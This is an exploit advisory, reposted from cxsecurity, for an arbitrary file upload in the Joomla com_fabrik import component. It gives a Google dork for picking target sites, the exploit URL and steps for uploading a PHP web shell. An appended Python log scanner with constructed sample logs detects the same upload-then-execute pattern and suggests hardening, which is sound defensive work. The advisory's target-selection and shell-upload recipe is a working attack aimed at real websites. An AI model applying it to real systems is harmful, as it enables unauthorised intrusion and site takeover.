F3D4İ's Joomla Arbitrary File Upload Vulnerability

2017.01.08
Credit: F3D4İ
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : F3D4İ's Joomla Arbitrary File Upload Vulnerability
# Google Dork : inurl:viewtable?cid= site:it
# Tested On : [ Windows- Linux ]
# Date: 07.01.2017
# Exploit Author: F3D4İ
# Author Details: twitter.com/f3d4i6
# Tested on: Kali Linux 2.0 / Windows 7-8-10
# Youtube Link : https://youtu.be/TFEVrNYuJBk
######################
# [+] DESCRIPTION :
######################
# 1: Search Google Dork and Choose a Target
# 2: exploit: /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
# 3: upload shell.php or index.html
# 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
------------------------------------------------
This exploit works on all Joomla versions, but for websites of the Italian kind.
# demo:
# Br0thers: By B0zoklu - Tmk - Kara Murat - Trajedi - DArkSide - DarkDemon - E.C - M4ni4c - M4DD3
# We are Turkish Hackers

References:

https://youtu.be/TFEVrNYuJBk
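
Added example (not part of the original advisory): a web access log check for the request pattern in steps 2-4 above, a POST to the com_fabrik import view followed by a script file served from a media/ directory. The log lines are constructed samples in combined log format, and all function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jan/2017:10:01:02 +0100] "GET /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jan/2017:10:01:09 +0100] "POST /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jan/2017:10:01:15 +0100] "GET /media/shell.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.4 - - [07/Jan/2017:10:02:00 +0100] "GET /media/system/js/core.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.4 - - [07/Jan/2017:10:02:05 +0100] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A script file sitting directly in a media/ directory, at any site prefix.
SCRIPT_RE = re.compile(r"(^|/)media/[^/]+\.(php\d?|phtml|phar)$", re.I)

def classify(method, target):
    """Return a finding label for one request, or None if unremarkable."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if query.get("option") == ["com_fabrik"] and query.get("view") == ["import"]:
        return "fabrik-import-upload" if method == "POST" else "fabrik-import-view"
    if SCRIPT_RE.search(url.path):
        return "script-in-media"
    return None

def scan(log_text):
    """Parse log text into (ip, timestamp, label, status) findings."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, target, status = m.groups()
            label = classify(method, target)
            if label:
                findings.append((ip, ts, label, int(status)))
    return findings

def upload_then_execute(findings):
    """Client IPs that POSTed to the import view, then got a 200 for a script in media/."""
    uploaded, hits = set(), []
    for ip, _ts, label, status in findings:
        if label == "fabrik-import-upload":
            uploaded.add(ip)
        elif label == "script-in-media" and status == 200 and ip in uploaded and ip not in hits:
            hits.append(ip)
    return hits

if __name__ == "__main__":
    print(upload_then_execute(scan(SAMPLE_LOG)))
```

A 200 response for a script under media/ is worth investigating on its own, since that directory normally serves only static assets; disabling script execution there in the web server configuration removes the impact of a stray upload.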



Copyright 2017, cxsecurity.com

 
